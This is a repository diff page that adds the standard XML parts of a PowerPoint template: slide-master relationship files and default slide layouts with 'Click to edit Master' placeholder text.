<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>

View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>

View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>

View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>

View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="title" preserve="1"><p:cSld name="Title Slide"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Title 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ctrTitle"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="685800" y="2130425"/><a:ext cx="7772400" cy="1470025"/></a:xfrm></p:spPr><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master title style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Subtitle 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="subTitle" idx="1"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="1371600" y="3886200"/><a:ext cx="6400800" cy="1752600"/></a:xfrm></p:spPr><p:txBody><a:bodyPr/><a:lstStyle><a:lvl1pPr marL="0" indent="0" algn="ctr"><a:buNone/><a:defRPr><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl1pPr><a:lvl2pPr marL="457200" indent="0" algn="ctr"><a:buNone/><a:defRPr><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl2pPr><a:lvl3pPr marL="914400" indent="0" algn="ctr"><a:buNone/><a:defRPr><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl3pPr><a:lvl4pPr marL="1371600" indent="0" algn="ctr"><a:buNone/><a:defRPr><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl4pPr><a:lvl5pPr marL="1828800" indent="0" algn="ctr"><a:buNone/><a:defRPr><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl5pPr><a:lvl6pPr marL="2286000" indent="0" algn="ctr"><a:buNone/><a:defRPr><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl6pPr><a:lvl7pPr marL="2743200" indent="0" algn="ctr"><a:buNone/><a:defRPr><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl7pPr><a:lvl8pPr marL="3200400" indent="0" algn="ctr"><a:buNone/><a:defRPr><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl8pPr><a:lvl9pPr marL="3657600" indent="0" algn="ctr"><a:buNone/><a:defRPr><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl9pPr></a:lstStyle><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master subtitle style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Date Placeholder 3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="5" name="Footer Placeholder 4"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="6" name="Slide Number Placeholder 5"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>#</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>

View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="vertTx" preserve="1"><p:cSld name="Title and Vertical Text"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Title 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="title"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master title style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Vertical Text Placeholder 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="body" orient="vert" idx="1"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr vert="eaVert"/><a:lstStyle/><a:p><a:pPr lvl="0"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master text styles</a:t></a:r></a:p><a:p><a:pPr lvl="1"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Second level</a:t></a:r></a:p><a:p><a:pPr lvl="2"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Third level</a:t></a:r></a:p><a:p><a:pPr lvl="3"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fourth level</a:t></a:r></a:p><a:p><a:pPr lvl="4"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fifth level</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Date Placeholder 3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="5" name="Footer Placeholder 4"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="6" name="Slide Number Placeholder 5"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>#</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>

View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="vertTitleAndTx" preserve="1"><p:cSld name="Vertical Title and Text"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Vertical Title 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="title" orient="vert"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="6629400" y="274638"/><a:ext cx="2057400" cy="5851525"/></a:xfrm></p:spPr><p:txBody><a:bodyPr vert="eaVert"/><a:lstStyle/><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master title style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Vertical Text Placeholder 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="body" orient="vert" idx="1"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="457200" y="274638"/><a:ext cx="6019800" cy="5851525"/></a:xfrm></p:spPr><p:txBody><a:bodyPr vert="eaVert"/><a:lstStyle/><a:p><a:pPr lvl="0"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master text styles</a:t></a:r></a:p><a:p><a:pPr lvl="1"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Second level</a:t></a:r></a:p><a:p><a:pPr lvl="2"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Third level</a:t></a:r></a:p><a:p><a:pPr lvl="3"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fourth level</a:t></a:r></a:p><a:p><a:pPr lvl="4"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fifth level</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Date Placeholder 3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="5" name="Footer Placeholder 4"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="6" name="Slide Number Placeholder 5"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>#</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>

View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="obj" preserve="1"><p:cSld name="Title and Content"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Title 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="title"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master title style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Content Placeholder 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph idx="1"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:pPr lvl="0"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master text styles</a:t></a:r></a:p><a:p><a:pPr lvl="1"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Second level</a:t></a:r></a:p><a:p><a:pPr lvl="2"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Third level</a:t></a:r></a:p><a:p><a:pPr lvl="3"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fourth level</a:t></a:r></a:p><a:p><a:pPr lvl="4"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fifth level</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Date Placeholder 3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="5" name="Footer Placeholder 4"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="6" name="Slide Number Placeholder 5"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>#</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>

View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="secHead" preserve="1"><p:cSld name="Section Header"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Title 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="title"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="722313" y="4406900"/><a:ext cx="7772400" cy="1362075"/></a:xfrm></p:spPr><p:txBody><a:bodyPr anchor="t"/><a:lstStyle><a:lvl1pPr algn="l"><a:defRPr sz="4000" b="1" cap="all"/></a:lvl1pPr></a:lstStyle><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master title style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Text Placeholder 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="body" idx="1"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="722313" y="2906713"/><a:ext cx="7772400" cy="1500187"/></a:xfrm></p:spPr><p:txBody><a:bodyPr anchor="b"/><a:lstStyle><a:lvl1pPr marL="0" indent="0"><a:buNone/><a:defRPr sz="2000"><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl1pPr><a:lvl2pPr marL="457200" indent="0"><a:buNone/><a:defRPr sz="1800"><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl2pPr><a:lvl3pPr marL="914400" indent="0"><a:buNone/><a:defRPr sz="1600"><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl3pPr><a:lvl4pPr marL="1371600" indent="0"><a:buNone/><a:defRPr sz="1400"><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl4pPr><a:lvl5pPr marL="1828800" indent="0"><a:buNone/><a:defRPr sz="1400"><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl5pPr><a:lvl6pPr marL="2286000" indent="0"><a:buNone/><a:defRPr sz="1400"><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl6pPr><a:lvl7pPr marL="2743200" indent="0"><a:buNone/><a:defRPr sz="1400"><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl7pPr><a:lvl8pPr marL="3200400" indent="0"><a:buNone/><a:defRPr sz="1400"><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl8pPr><a:lvl9pPr marL="3657600" indent="0"><a:buNone/><a:defRPr sz="1400"><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl9pPr></a:lstStyle><a:p><a:pPr lvl="0"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master text styles</a:t></a:r></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Date Placeholder 3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="5" name="Footer Placeholder 4"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="6" name="Slide Number Placeholder 5"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>#</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>

View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="twoObj" preserve="1"><p:cSld name="Two Content"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Title 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="title"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master title style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Content Placeholder 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph sz="half" idx="1"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="457200" y="1600200"/><a:ext cx="4038600" cy="4525963"/></a:xfrm></p:spPr><p:txBody><a:bodyPr/><a:lstStyle><a:lvl1pPr><a:defRPr sz="2800"/></a:lvl1pPr><a:lvl2pPr><a:defRPr sz="2400"/></a:lvl2pPr><a:lvl3pPr><a:defRPr sz="2000"/></a:lvl3pPr><a:lvl4pPr><a:defRPr sz="1800"/></a:lvl4pPr><a:lvl5pPr><a:defRPr sz="1800"/></a:lvl5pPr><a:lvl6pPr><a:defRPr sz="1800"/></a:lvl6pPr><a:lvl7pPr><a:defRPr sz="1800"/></a:lvl7pPr><a:lvl8pPr><a:defRPr sz="1800"/></a:lvl8pPr><a:lvl9pPr><a:defRPr sz="1800"/></a:lvl9pPr></a:lstStyle><a:p><a:pPr lvl="0"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master text styles</a:t></a:r></a:p><a:p><a:pPr lvl="1"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Second level</a:t></a:r></a:p><a:p><a:pPr lvl="2"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Third level</a:t></a:r></a:p><a:p><a:pPr lvl="3"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fourth level</a:t></a:r></a:p><a:p><a:pPr lvl="4"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fifth level</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Content Placeholder 3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph sz="half" idx="2"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="4648200" y="1600200"/><a:ext cx="4038600" cy="4525963"/></a:xfrm></p:spPr><p:txBody><a:bodyPr/><a:lstStyle><a:lvl1pPr><a:defRPr sz="2800"/></a:lvl1pPr><a:lvl2pPr><a:defRPr sz="2400"/></a:lvl2pPr><a:lvl3pPr><a:defRPr sz="2000"/></a:lvl3pPr><a:lvl4pPr><a:defRPr sz="1800"/></a:lvl4pPr><a:lvl5pPr><a:defRPr sz="1800"/></a:lvl5pPr><a:lvl6pPr><a:defRPr sz="1800"/></a:lvl6pPr><a:lvl7pPr><a:defRPr sz="1800"/></a:lvl7pPr><a:lvl8pPr><a:defRPr sz="1800"/></a:lvl8pPr><a:lvl9pPr><a:defRPr sz="1800"/></a:lvl9pPr></a:lstStyle><a:p><a:pPr lvl="0"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master text styles</a:t></a:r></a:p><a:p><a:pPr lvl="1"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Second level</a:t></a:r></a:p><a:p><a:pPr lvl="2"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Third level</a:t></a:r></a:p><a:p><a:pPr lvl="3"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fourth level</a:t></a:r></a:p><a:p><a:pPr lvl="4"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fifth level</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="5" name="Date Placeholder 4"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="6" name="Footer Placeholder 5"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="7" name="Slide Number Placeholder 6"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>#</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
